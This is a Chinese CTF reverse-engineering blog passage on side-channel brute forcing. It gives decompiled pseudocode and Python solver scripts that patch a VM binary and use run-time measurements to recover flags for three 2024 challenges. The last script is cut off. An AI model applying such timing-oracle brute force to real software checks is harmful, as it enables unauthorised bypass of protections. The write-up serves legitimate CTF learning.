0%

侧信道攻击

侧信道攻击最原始的想法是直接对程序输入数据进行爆破测试 例如羊城杯2024逆向的Rust-VM:

(虽然这并不是侧信道攻击的前置知识 但是不妨碍我把它当成能联想到侧信道的最原始的想法()

[2024 羊城杯]-Rust_vm

前面的第一步加密和主题的关系不大 直接跳过 只需要知道动调出来的结果是将输入的内容进行base64第一步编码 即将输入数据(flag包裹的内容 长度为32bytes)分割为6bits 最后长度是44bytes 重要的是接下来的虚拟机过程:

image-20240829110239568

可以看到处理函数调用了22次 并且每次处理2bytes数据 这时候就应该敏感地察觉到爆破的可能性 而虚拟机内部:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
// positive sp value has been detected, the output may be wrong!
// Decompiler pseudocode of one VM step; according to the surrounding article
// this handler is invoked 22 times, each time on 2 bytes of the encoded input.
//
// OPCODES_REGS: base pointer of the VM state. This function itself only reads
//               and writes single bytes at offsets 1040..1051; anything else is
//               done inside the opaque helpers sub_40AA60 / sub_40A800.
// a2:           copied into the local v45 and then read one byte at a time
//               through *((_BYTE *)&v45 + index).
// a3:           packed operand word; its four bytes (v4, BYTE1, the low byte of
//               HIWORD, HIBYTE) are used as byte indices into v45 and as
//               operands of the 2-bit dispatch switches below.
//
// NOTE(review): sub_403550(index, 4, &off_...) is called whenever one of those
// indices is >= 4; presumably a bounds-check failure handler that does not
// return - confirm in the binary.
void __fastcall proc(__int64 OPCODES_REGS, int a2, unsigned int a3)
{
__int64 v4; // r9
__int64 v6; // rdx
__int64 v7; // r8
char v8; // cl
char v9; // al
__int64 v10; // rcx
unsigned int v11; // r12d
__int64 v12; // r15
unsigned __int8 v13; // al
char v14; // cl
unsigned __int8 v15; // r13
__int64 v16; // rbx
__int64 v17; // rbp
bool v18; // r14
unsigned __int8 v19; // dl
unsigned __int8 v20; // bp
__int64 v21; // r12
__int64 v22; // r15
__int64 v23; // rax
unsigned int v24; // edi
int v25; // r10d
char v26; // bp
unsigned __int8 v27; // al
__int64 v28; // r15
__int64 v29; // rcx
int v30; // r14d
__int64 v31; // rdx
unsigned int v32; // ecx
__int64 v33; // r10
__int64 v34; // rax
__int64 v35; // rdx
__int64 v36; // r9
__int64 v37; // rax
__int64 v38; // rdx
__int64 v39; // rdx
unsigned __int8 v40; // bp
__int64 v41; // rax
__int64 v42; // rdx
__int64 v43; // rdx
__int64 v44; // rdx
int v45; // [rsp-7Ch] [rbp-124h]
__int64 v46; // [rsp-78h] [rbp-120h]
__int64 v47; // [rsp-70h] [rbp-118h]
__int64 v48; // [rsp-68h] [rbp-110h]
int v49; // [rsp-5Ch] [rbp-104h]
__int64 v50; // [rsp-58h] [rbp-100h]
__int64 v51; // [rsp-50h] [rbp-F8h]
__int64 v52; // [rsp-48h] [rbp-F0h]

// Spill a2 so its four bytes can be addressed individually.
v45 = a2;
// Byte 0 of a3 selects which byte of v45 to load first.
v4 = (unsigned __int8)a3;
if ( (unsigned __int8)a3 > 3u )
sub_403550((unsigned __int8)a3, 4LL, &off_442EF0);
v6 = a3;
v7 = a3 >> 8;
// The selected byte is split: top 2 bits adjust the destination slot,
// low 6 bits are the value stored (also mirrored to offset 1051).
v8 = a3 + (*((_BYTE *)&v45 + v4) >> 6);
v9 = *((_BYTE *)&v45 + v4) & 0x3F;
*(_BYTE *)(OPCODES_REGS + 1051) = v9;
*(_BYTE *)(OPCODES_REGS + 2LL * (v8 & 3) + 1041) = v9;
// Same load for the byte selected by byte 1 of a3.
v10 = BYTE1(a3);
if ( BYTE1(a3) >= 4u )
sub_403550(BYTE1(a3), 4LL, &off_442F08);
v11 = HIWORD(a3);
v12 = HIBYTE(a3);
v13 = *((_BYTE *)&v45 + v10);
v46 = v7;
*(_BYTE *)(OPCODES_REGS + 2LL * (((_BYTE)v7 + (v13 >> 6)) & 3) + 1041) = v13 & 0x3F;
*(_BYTE *)(OPCODES_REGS + (((unsigned __int8)(65 * v11) >> 5) | 1LL) + 1040) = (65 * v11) & 0x3F;
v14 = (65 * v12) & 0x3F;
*(_BYTE *)(OPCODES_REGS + 1051) = v14;
*(_BYTE *)(OPCODES_REGS + (((unsigned __int8)(65 * v12) >> 5) | 1LL) + 1040) = v14;
// v15 packs an 8-bit operation word: bits 7..6 pick the switch case,
// bit 5 is a flag (v18), bits 4..3 give v17, and v16 comes from v12 & 3.
v15 = 8 * v11 + 2 * v12;
v16 = v12 & 3;
v17 = (v15 >> 3) & 3;
v18 = (v15 & 0x20) != 0;
v50 = v15 >> 6;
v52 = (unsigned __int8)v11;
v51 = v4;
// First instance of the 4-way dispatch pattern that is repeated (inlined)
// several more times below with different operation words.
switch ( v15 >> 6 )
{
case 0:
*(_BYTE *)(OPCODES_REGS + 2 * v16 + 1040) = *(_BYTE *)(OPCODES_REGS + 2 * v16 + 1041);
*(_BYTE *)(OPCODES_REGS + 2LL * (unsigned __int8)v17 + 1040) = *(_BYTE *)(OPCODES_REGS + 2LL * (unsigned __int8)v17 + 1041);
*(_BYTE *)(OPCODES_REGS + 2 * v16 + 1041) = 0;
*(_BYTE *)(OPCODES_REGS + 2LL * (unsigned __int8)v17 + 1041) = 0;
break;
case 1:
*(_BYTE *)(OPCODES_REGS + (unsigned __int8)(v17 | (4 * v18)) + 1040) = *(_BYTE *)(OPCODES_REGS + v16 + 1040);
break;
case 2:
if ( (v15 & 0x20) != 0 )
*(_BYTE *)(OPCODES_REGS + v17 + 1048) = *(_BYTE *)(OPCODES_REGS + 2 * v16 + 1040);
else
*(_BYTE *)(OPCODES_REGS + 2 * v16 + 1041) = *(_BYTE *)(OPCODES_REGS + v17 + 1048);
break;
case 3:
*(_BYTE *)(OPCODES_REGS + 1051) = v15 & 0x3E;
break;
}
v48 = v6;
// Opaque helpers; their effect on the VM state is not visible from here.
((void (__fastcall *)(__int64, __int64, _QWORD))sub_40AA60)(OPCODES_REGS, v6, v11);
((void (__fastcall *)(__int64, __int64, _QWORD))sub_40AA60)(OPCODES_REGS, v46, (unsigned int)v12);
if ( (unsigned __int8)v11 >= 4u )
sub_403550((unsigned __int8)v11, 4LL, &off_442F20);
v47 = ((unsigned __int8)(8 * v11 + 2 * v12) >> 3) & 3;
// Load the bytes of v45 selected by bytes 2 and 3 of a3.
v19 = *((_BYTE *)&v45 + (unsigned __int8)v11);
v49 = 2 * v11;
*(_BYTE *)(OPCODES_REGS + ((2 * (_BYTE)v11) & 6) + 1041) = v19 & 0x3F;
v20 = *((_BYTE *)&v45 + v12);
*(_BYTE *)(OPCODES_REGS + 1051) = v20 & 0x3F;
v21 = 2 * v16;
v22 = 2 * v16 + 1;
*(_BYTE *)(OPCODES_REGS + 2 * v16 + 1041) = v20 & 0x3F;
((void (__fastcall *)(__int64, _QWORD))sub_40A800)(OPCODES_REGS, (v19 >> 6) | 0x20u);
((void (__fastcall *)(__int64, _QWORD))sub_40A800)(OPCODES_REGS, (v20 >> 6) | 0x24u);
// Second dispatch on the same selector (v50 == v15 >> 6); there is no case 3
// here, and v24/v25 are only assigned on the paths shown.
switch ( v50 )
{
case 0LL:
*(_BYTE *)(OPCODES_REGS + v21 + 1040) = *(_BYTE *)(OPCODES_REGS + v22 + 1040);
v23 = (unsigned __int8)v47;
*(_BYTE *)(OPCODES_REGS + 2LL * (unsigned __int8)v47 + 1040) = *(_BYTE *)(OPCODES_REGS + 2LL * (unsigned __int8)v47 + 1041);
*(_BYTE *)(OPCODES_REGS + v22 + 1040) = 0;
*(_BYTE *)(OPCODES_REGS + 2 * v23 + 1041) = 0;
goto LABEL_16;
case 1LL:
*(_BYTE *)(OPCODES_REGS + (unsigned __int8)(v47 + 4 * v18) + 1040) = *(_BYTE *)(OPCODES_REGS + v16 + 1040);
LABEL_16:
v24 = v46;
v25 = v48;
break;
case 2LL:
v24 = v46;
v25 = v48;
if ( (v15 & 0x20) != 0 )
*(_BYTE *)(OPCODES_REGS + v47 + 1048) = *(_BYTE *)(OPCODES_REGS + v21 + 1040);
else
*(_BYTE *)(OPCODES_REGS + v22 + 1040) = *(_BYTE *)(OPCODES_REGS + v47 + 1048);
break;
}
// Operation word built from the low bytes of a3 (v24 = a3 >> 8, v25 = a3).
v26 = 2 * v24;
v27 = 2 * v24 + 8 * v25;
v28 = v24 & 3;
v29 = (v27 >> 3) & 3;
switch ( v27 >> 6 )
{
case 0:
*(_BYTE *)(OPCODES_REGS + 2LL * (unsigned __int8)v28 + 1040) = *(_BYTE *)(OPCODES_REGS + 2LL * (unsigned __int8)v28 + 1041);
*(_BYTE *)(OPCODES_REGS + 2LL * (unsigned __int8)v29 + 1040) = *(_BYTE *)(OPCODES_REGS + 2LL * (unsigned __int8)v29 + 1041);
*(_BYTE *)(OPCODES_REGS + 2LL * (unsigned __int8)v28 + 1041) = 0;
*(_BYTE *)(OPCODES_REGS + 2LL * (unsigned __int8)v29 + 1041) = 0;
break;
case 1:
*(_BYTE *)(OPCODES_REGS + (unsigned __int8)(v29 | (4 * ((v27 & 0x20) != 0))) + 1040) = *(_BYTE *)(OPCODES_REGS + v28 + 1040);
break;
case 2:
if ( (v27 & 0x20) != 0 )
*(_BYTE *)(OPCODES_REGS + v29 + 1048) = *(_BYTE *)(OPCODES_REGS + 2LL * (unsigned __int8)v28 + 1040);
else
*(_BYTE *)(OPCODES_REGS + 2LL * (unsigned __int8)v28 + 1041) = *(_BYTE *)(OPCODES_REGS + v29 + 1048);
break;
case 3:
*(_BYTE *)(OPCODES_REGS + 1051) = v27 & 0x3E;
break;
}
// Fixed sequence of sub_40A800 calls parameterised by v25 (low part of a3).
v30 = v25;
((void (__fastcall *)(__int64, _QWORD))sub_40A800)(OPCODES_REGS, (unsigned int)(v25 - 116));
((void (__fastcall *)(__int64, _QWORD))sub_40A800)(OPCODES_REGS, (unsigned int)(v30 - 72));
((void (__fastcall *)(__int64, _QWORD))sub_40A800)(OPCODES_REGS, (unsigned int)(v30 - 84));
LOBYTE(v31) = 0x80;
((void (__fastcall *)(__int64, __int64))sub_40A800)(OPCODES_REGS, v31);
((void (__fastcall *)(__int64, _QWORD))sub_40A800)(OPCODES_REGS, (unsigned int)(v30 - 76));
((void (__fastcall *)(__int64, _QWORD))sub_40A800)(OPCODES_REGS, (unsigned int)(v30 - 104));
// Dispatch on the operation word (2 * v30 - 88), using v51 (byte 0 of a3) & 3.
v32 = 2 * v30;
LOBYTE(v32) = 2 * v30 - 88;
v33 = v51 & 3;
v34 = ((unsigned __int8)v32 >> 3) & 3;
v35 = v32;
switch ( (unsigned __int8)v32 >> 6 )
{
case 0:
*(_BYTE *)(OPCODES_REGS + 2LL * (unsigned __int8)v33 + 1040) = *(_BYTE *)(OPCODES_REGS + 2LL * (unsigned __int8)v33 + 1041);
v35 = *(unsigned __int8 *)(OPCODES_REGS + 2LL * (unsigned __int8)v34 + 1041);
*(_BYTE *)(OPCODES_REGS + 2LL * (unsigned __int8)v34 + 1040) = v35;
*(_BYTE *)(OPCODES_REGS + 2LL * (unsigned __int8)v33 + 1041) = 0;
*(_BYTE *)(OPCODES_REGS + 2LL * (unsigned __int8)v34 + 1041) = 0;
break;
case 1:
*(_BYTE *)(OPCODES_REGS + (unsigned __int8)(v34 | (4 * ((v32 & 0x20) != 0))) + 1040) = *(_BYTE *)(OPCODES_REGS + v33 + 1040);
break;
case 2:
if ( (v32 & 0x20) != 0 )
*(_BYTE *)(OPCODES_REGS + v34 + 1048) = *(_BYTE *)(OPCODES_REGS + 2LL * (unsigned __int8)v33 + 1040);
else
*(_BYTE *)(OPCODES_REGS + 2LL * (unsigned __int8)v33 + 1041) = *(_BYTE *)(OPCODES_REGS + v34 + 1048);
break;
case 3:
*(_BYTE *)(OPCODES_REGS + 1051) = v32 & 0x3E;
break;
}
LOBYTE(v35) = -124;
((void (__fastcall *)(__int64, __int64))sub_40A800)(OPCODES_REGS, v35);
// Dispatch on the operation word (v49 - 88) where v49 = 2 * v11, using v52 & 3.
v36 = v52 & 3;
v37 = ((unsigned __int8)(v49 - 88) >> 3) & 3;
switch ( (unsigned __int8)(v49 - 88) >> 6 )
{
case 0:
*(_BYTE *)(OPCODES_REGS + 2LL * (unsigned __int8)v36 + 1040) = *(_BYTE *)(OPCODES_REGS + 2LL * (unsigned __int8)v36 + 1041);
*(_BYTE *)(OPCODES_REGS + 2LL * (unsigned __int8)v37 + 1040) = *(_BYTE *)(OPCODES_REGS + 2LL * (unsigned __int8)v37 + 1041);
*(_BYTE *)(OPCODES_REGS + 2LL * (unsigned __int8)v36 + 1041) = 0;
*(_BYTE *)(OPCODES_REGS + 2LL * (unsigned __int8)v37 + 1041) = 0;
break;
case 1:
*(_BYTE *)(OPCODES_REGS + (unsigned __int8)(v37 | (4 * ((((_BYTE)v49 - 88) & 0x20) != 0))) + 1040) = *(_BYTE *)(OPCODES_REGS + v36 + 1040);
break;
case 2:
if ( (((_BYTE)v49 - 88) & 0x20) != 0 )
*(_BYTE *)(OPCODES_REGS + v37 + 1048) = *(_BYTE *)(OPCODES_REGS + 2LL * (unsigned __int8)v36 + 1040);
else
*(_BYTE *)(OPCODES_REGS + 2LL * (unsigned __int8)v36 + 1041) = *(_BYTE *)(OPCODES_REGS + v37 + 1048);
break;
case 3:
*(_BYTE *)(OPCODES_REGS + 1051) = (v49 - 88) & 0x3E;
break;
}
((void (__fastcall *)(__int64, _QWORD))sub_40A800)(OPCODES_REGS, 0LL);
LOBYTE(v38) = -100;
((void (__fastcall *)(__int64, __int64))sub_40A800)(OPCODES_REGS, v38);
// Same sub_40A800 sequence as above, this time parameterised by v24 (a3 >> 8).
((void (__fastcall *)(__int64, _QWORD))sub_40A800)(OPCODES_REGS, v24 - 116);
((void (__fastcall *)(__int64, _QWORD))sub_40A800)(OPCODES_REGS, v24 - 72);
((void (__fastcall *)(__int64, _QWORD))sub_40A800)(OPCODES_REGS, v24 - 84);
LOBYTE(v39) = 0x80;
((void (__fastcall *)(__int64, __int64))sub_40A800)(OPCODES_REGS, v39);
((void (__fastcall *)(__int64, _QWORD))sub_40A800)(OPCODES_REGS, v24 - 76);
LOBYTE(v24) = v24 - 104;
((void (__fastcall *)(__int64, _QWORD))sub_40A800)(OPCODES_REGS, v24);
// Dispatch on the operation word (v26 - 88) where v26 = 2 * v24, using v28.
v40 = v26 - 88;
v41 = (v40 >> 3) & 3;
v42 = v40 >> 6;
switch ( v40 >> 6 )
{
case 0:
*(_BYTE *)(OPCODES_REGS + 2LL * (unsigned __int8)v28 + 1040) = *(_BYTE *)(OPCODES_REGS + 2LL * (unsigned __int8)v28 + 1041);
v42 = *(unsigned __int8 *)(OPCODES_REGS + 2LL * (unsigned __int8)v41 + 1041);
*(_BYTE *)(OPCODES_REGS + 2LL * (unsigned __int8)v41 + 1040) = v42;
*(_BYTE *)(OPCODES_REGS + 2LL * (unsigned __int8)v28 + 1041) = 0;
*(_BYTE *)(OPCODES_REGS + 2LL * (unsigned __int8)v41 + 1041) = 0;
break;
case 1:
*(_BYTE *)(OPCODES_REGS + (unsigned __int8)(v41 | (4 * ((v40 & 0x20) != 0))) + 1040) = *(_BYTE *)(OPCODES_REGS + v28 + 1040);
break;
case 2:
if ( (v40 & 0x20) != 0 )
*(_BYTE *)(OPCODES_REGS + v41 + 1048) = *(_BYTE *)(OPCODES_REGS + 2LL * (unsigned __int8)v28 + 1040);
else
*(_BYTE *)(OPCODES_REGS + 2LL * (unsigned __int8)v28 + 1041) = *(_BYTE *)(OPCODES_REGS + v41 + 1048);
break;
case 3:
*(_BYTE *)(OPCODES_REGS + 1051) = v40 & 0x3E;
break;
}
LOBYTE(v42) = -124;
((void (__fastcall *)(__int64, __int64))sub_40A800)(OPCODES_REGS, v42);
// Copy the byte at 1040 + 2 * (v12 & 3) into offset 1049 before the final calls.
*(_BYTE *)(OPCODES_REGS + 1049) = *(_BYTE *)(OPCODES_REGS + v21 + 1040);
LOBYTE(v43) = 4;
((void (__fastcall *)(__int64, __int64))sub_40A800)(OPCODES_REGS, v43);
LOBYTE(v44) = -100;
((void (__fastcall *)(__int64, __int64))sub_40A800)(OPCODES_REGS, v44);
}

很明显是难以直接分析或者模拟这个过程进行爆破的 这时候就会自然想到直接对程序输入数据进行爆破的方法 python的subprocess模块就是实现这个想法和下面侧信道攻击的关键 对于这道题 由于缺少侧信道爆破的关键要素–程序含有大量导致程序退出的分支 所以这里要修改一下程序

动调的过程可以很明显看出上述OPCODES_REGS偏移为1040开始是一系列的寄存器 0~1040的数据目测是opcode不过这个不重要 直接看到所有处理函数执行完后的校验环节:

image-20240829111502100

可以看到程序通过检查第8个寄存器(偏移 8 * 131 = 1048 即寄存器起始偏移 1040 + 8)的值来判断是否正确 这时候再调试一遍 着重观察第八个寄存器 可以看到每次执行完proc都会增加1~2 最后是一个非零值 这时候就能猜测到它储存的是比对后与正确数据不相等的数据个数 这时候就能开始准备patch程序了 这里选择把每个proc()后的指令patch为跳转到判断目标寄存器的jmp指令(如果要在每个proc后直接增加一个或者修改成cmp的话可能会因为指令长度的问题爆段) 观察到每次proc指令后都会对比r15寄存器的值进行异常处理:

image-20240829112123666

据此筛选出符合条件的21个cmp(最后一个proc不用跳转) patch成目标指令:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
from keystone import *
from capstone import *

# Produce a series of patched copies of vm.exe. Each selected `cmp r15, ...`
# is overwritten with a jump to the final check at 0x40CE56. Patches are
# applied from the last site backwards and accumulate in `data`, and a copy
# is written after every patch.
pe = 'bzff\\vm.exe'
with open(pe, 'rb') as f:
    data = bytearray(f.read())

target = 0x40B2E0  # first virtual address to disassemble
base = 0x400c00    # subtracted from a virtual address to get its file offset
end = 0x40CF45     # end of the disassembled range (exclusive)
ks = Ks(KS_ARCH_X86, KS_MODE_64)
cs = Cs(CS_ARCH_X86, CS_MODE_64)

# Collect the address of every `cmp r15, ...` in the range, then drop the
# first eight hits.
to_patch = [
    ins.address
    for ins in cs.disasm(data[target - base: end - base], target)
    if ins.mnemonic == 'cmp' and ins.op_str.startswith('r15')
]
to_patch = to_patch[8:]

new_op = 'jmp 0x40CE56'
for c, ins in enumerate(to_patch[::-1]):
    # Assemble at the patch address so the relative jump is encoded correctly.
    new_ins, count = ks.asm(new_op, ins)
    if count != 1:
        print('Failed to assemble')
        break
    data[ins - base: ins - base + len(new_ins)] = new_ins
    print(f'Patched {hex(ins)}: {new_op}')
    with open(f'bzff\\vm_{21 - c}.exe', 'wb') as file:
        file.write(data)

这样就获得了每次对比2*n(0 < n < 23)个数据的22个pe文件 接下来要做的就是向这些pe文件输入数据 思路是将通过了第n轮检测的数据输入到第n + 1个pe文件中进行下一轮的判断 直到进行完所有的22轮 这里的第一步处理导致实际上每一轮检测的2个数据对应的是32 / 22 ≈ 1.5个输入字符 这是这题的爆破解法的最后一个难点 需要手动控制已确定字符的长度并手动修改需要进行判断的轮数:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
import subprocess, threading, time, copy

# Last two characters of each candidate's stdout, keyed by the candidate id.
stdouts = {}


def run(arg, c, i):
    """Feed `arg` to the i-th patched binary and record the tail of its output.

    arg: full flag string written to the program's stdin.
    c:   key under which the result is stored in `stdouts`.
    i:   index of the patched binary to run.

    Returns the complete stdout text of the process.
    """
    # The patch script writes its outputs as bzff\vm_<n>.exe, so launch that
    # name (the previous 'vm.exe_<n>' spelling did not match any written file).
    proc = subprocess.Popen(
        [f'bzff\\vm_{i}.exe'],
        stdin=subprocess.PIPE,
        stdout=subprocess.PIPE,
        stderr=subprocess.PIPE,
        text=True,
    )
    stdout, stderr = proc.communicate(input=arg)
    stdouts[c] = stdout[-2:]
    # print(f'[+]Testing: {c}')
    return stdout

def check_thread_exit(threads):
    """Block until every thread in `threads` has finished, then empty the list.

    Joining each thread returns as soon as the last worker ends, instead of
    polling `is_alive()` once per second.
    """
    for thread in threads:
        thread.join()
    threads.clear()


# Known prefix, the 32 hex characters recovered so far, padding, closing brace.
flag = list('DASCTF{')
flag += list('c669733af3ce4459b88016420b81cb15')
flag += list('_' * (39 - len(flag)) + '}')
print(''.join(flag))

char_table = '0123456789abcdef'
offset = 21      # round being tested; also selects the patched binary in run()
threads = []
pieces = []

# Try every 3-character hex combination at the position for this round.
for a in char_table:
    for b in char_table:
        for c in char_table:
            input_content = list(flag)  # shallow copy is enough for a list of str
            input_content[7 + 8 + offset : 7 + 8 + offset + 3] = [a, b, c]
            input_content = ''.join(input_content)
            print(input_content)
            t = threading.Thread(target=run, args=(input_content, a+b+c, offset))
            threads.append(t)
            t.start()
            # Cap the number of concurrently running processes at 256.
            if len(threads) == 256:
                check_thread_exit(threads)

# Wait for any workers left over from a final, partially filled batch so that
# their results are present before `stdouts` is inspected.
if threads:
    check_thread_exit(threads)

# A candidate passed this round when the program's output ends with '!\n'.
for piece, tail in stdouts.items():
    if tail == '!\n':
        pieces.append(piece)
stdouts.clear()
print(f'Found: {pieces}')

实际上如果能找到一种直接对虚拟空间中目标内存空间进行赋值的api就可以实现全自动的爆破 也就是下面侧信道攻击的样式 这里挖个坑

以上就是侧信道攻击最原始的想法 下面详细说明时间侧信道攻击的方法和例子

上面应该也能看出来主要是通过subprocess.Popen()直接执行程序 如果程序通过命令行参数接收数据的话就直接将要添加的命令行参数添加到第一个参数的列表中 否则就像上面用communicate()方法进行数据交互 要注意的是只能输入可编码的数据(可见字符) 不能是字节串 时间侧信道攻击的另一个核心就是检查程序的执行时间并将每个输入的数据与进行这个输入后程序的运行时间对应起来 找到运行(存活)时间最长的一个输入当作正确的已确定字符 这里用TFCCTF2024的一道逆向作为例子

[2024 TFCCTF] Functional

程序是用Haskell编译的 比加了混淆还史 几乎不可能静态分析出加密和校验 上网找Haskell逆向的方法 几乎都是爆破 其中有一篇是通过pintool找到程序执行过的指令的条数来进行侧信道攻击 其实本质上和对时间的侧信道攻击大差不差 因为执行的指令条数在一定程度上可以用执行的时间来衡量 而执行的指令越多 执行的时间越长就说明越有可能是正确的字符(如果错误会直接退出) 这道题就是专门为这种方法设计的:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
import subprocess, threading, time

# Elapsed run time in seconds for each candidate character.
times = {}


def run(arg, c):
    """Run ./main with `arg` as its argument and record how long it took.

    arg: candidate flag passed as the single command-line argument.
    c:   key (the candidate character) under which the time is stored.

    Returns the raw stdout bytes of the process.
    """
    print('[+]Testing:' + arg)
    # perf_counter() is monotonic and high-resolution, which is what interval
    # measurement needs; time.time() can jump and may be coarse.
    t1 = time.perf_counter()
    proc = subprocess.Popen(['./main', arg], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
    stdout, stderr = proc.communicate()
    cost = time.perf_counter() - t1
    times[c] = cost
    return stdout

def check_thread_exit(threads):
    """Block until every thread in `threads` has finished.

    Joining each thread returns as soon as the last worker ends, instead of
    polling `is_alive()` once per second. The list itself is left unchanged.
    """
    for thread in threads:
        thread.join()


elf = './main'
# Length probe kept for reference: time the program on inputs of increasing
# length to find the expected flag length.
# times = {}
# for i in range(0x40):
#     input_content = i * '_'
#     t1 = time.time()
#     proc = subprocess.Popen([elf, input_content], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
#     stdout, stderr = proc.communicate()
#     cost = time.time() - t1
#     times[str(i)] = cost
# print(times)
right_len = 28
flag = list('TFCCTF{' + 'A' * (right_len - 7))
char_table = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ_{}+-!@#$%^&*()'

# Recover the flag one position at a time, starting after the known prefix.
for i in range(7, right_len):
    threads = []
    for c in char_table:
        # Work on a copy so the probe does not modify the confirmed prefix.
        candidate = list(flag)
        candidate[i] = c
        input_content = ''.join(candidate)
        t = threading.Thread(target=run, args=(input_content, c))
        threads.append(t)
        t.start()
    check_thread_exit(threads)
    # The candidate whose run lasted longest is taken as the correct character.
    most_likely = max(times, key=times.get)
    flag[i] = most_likely
    times.clear()

print('\n[+]Solution found:')
print(''.join(flag))

除了在普通的加密-校验程序中可以用到 侧信道还能在简单的游戏逆向中发挥作用 比如下面这个例子

[2024 DASCTF八月开学季] maze

直接看主函数可以看到是一个8 * 8 * 8的三维迷宫 没有设置地图边界 移动时只有碰到墙壁才会停下 越界则会直接判定失败并结束程序:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
// Decompiler pseudocode of the maze challenge's main().
// Reads a string of moves and walks `pos` through a flat maze array; the
// index arithmetic below (pos % 8, stride 8 within pos % 64, stride 64 with a
// limit of 512) corresponds to an 8 * 8 * 8 grid. Each move slides until the
// next cell is non-zero; leaving the grid, an unknown move character, or
// running out of input calls quit(). Reaching pos == 436 prints the success
// message.
// NOTE(review): quit() is presumably noreturn and print_0("%s", Str) is
// presumably the input read (scanf-like) - confirm in the binary.
int __fastcall main(int argc, const char **argv, const char **envp)
{
__int64 v3; // rdx
__int64 v4; // r8
__int64 v5; // rdx
__int64 v6; // r8
int pos; // [rsp+20h] [rbp-98h]
char Str[112]; // [rsp+30h] [rbp-88h] BYREF

pos = 0;
memset(Str, 0, 100);
print("Welcome to this sign in problem.\n", argv, envp);
print("Give me your input:", v3, v4);
print_0("%s", Str);
for ( step = 0; ; ++step )
{
// Input exhausted before the target was reached.
if ( step >= strlen(Str) )
quit();
// Fixed 0x28 (40) delay per processed move: a longer-surviving input takes
// measurably longer to run.
Sleep(0x28u);
switch ( Str[step] )
{
// 'a': step -1 within a row of 8.
case 'a':
while ( 1 )
{
v5 = (pos >> 31) & 7;
if ( pos % 8 - 1 < 0 )
quit();
if ( (*maze)[pos - 1] )
break;
--pos;
}
break;
// 'd': step +1 within a row of 8.
case 'd':
while ( 1 )
{
v5 = (pos >> 31) & 7;
if ( pos % 8 + 1 >= 8 )
quit();
if ( (*maze)[pos + 1] )
break;
++pos;
}
break;
// 'n': step -64 (previous 8 * 8 layer).
case 'n':
while ( 1 )
{
if ( pos - 64 < 0 )
quit();
if ( (*maze)[pos - 64] )
break;
pos -= 64;
}
break;
// 's': step +8 within a layer of 64.
case 's':
while ( 1 )
{
v5 = (pos >> 31) & 0x3F;
if ( pos % 64 + 8 >= 64 )
quit();
if ( (*maze)[pos + 8] )
break;
pos += 8;
}
break;
// 'u': step +64 (next 8 * 8 layer), bounded by 512 cells.
case 'u':
while ( 1 )
{
if ( pos + 64 >= 512 )
quit();
if ( (*maze)[pos + 64] )
break;
pos += 64;
}
break;
// 'w': step -8 within a layer of 64.
case 'w':
while ( 1 )
{
v5 = (pos >> 31) & 0x3F;
if ( pos % 64 - 8 < 0 )
quit();
if ( (*maze)[pos - 8] )
break;
pos -= 8;
}
break;
default:
quit();
}
// Target cell reached.
if ( pos == 436 )
break;
}
print("Good job, the flag is md5_32_lower(your input)", v5, v6);
return 0;
}

如果不想盯着迷宫硬解的话 也可以用时间侧信道进行爆破 只需要添加几个条件 例如不能重复一个步骤 不能在一步后进行相反的一步:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
import subprocess, threading, time, copy

# Elapsed run time in seconds and the last four stdout characters, both keyed
# by the two-move suffix under test.
times = {}
stdouts = {}


def run(arg, c):
    """Feed the move string `arg` to Maze.exe and record its timing and output tail.

    arg: complete move sequence written to the program's stdin.
    c:   key (the appended moves) used in `times` and `stdouts`.

    Returns the complete stdout text of the process.
    """
    # perf_counter() is monotonic and high-resolution, which is what interval
    # measurement needs; time.time() can jump and may be coarse.
    t1 = time.perf_counter()
    proc = subprocess.Popen(
        ['bzff\\Maze.exe'],
        stdin=subprocess.PIPE,
        stdout=subprocess.PIPE,
        stderr=subprocess.PIPE,
        text=True,
    )
    stdout, stderr = proc.communicate(input=arg)
    cost = time.perf_counter() - t1
    times[c] = cost
    stdouts[c] = stdout[-4:]
    return stdout

def check_thread_exit(threads):
    """Block until every thread in `threads` has finished.

    Joining each thread returns as soon as the last worker ends, instead of
    polling `is_alive()` once per second. The list itself is left unchanged.
    """
    for thread in threads:
        thread.join()


# Moves confirmed so far; the search extends this path one move per round.
flag = ['s', 'd']
# Each move mapped to the move that undoes it.
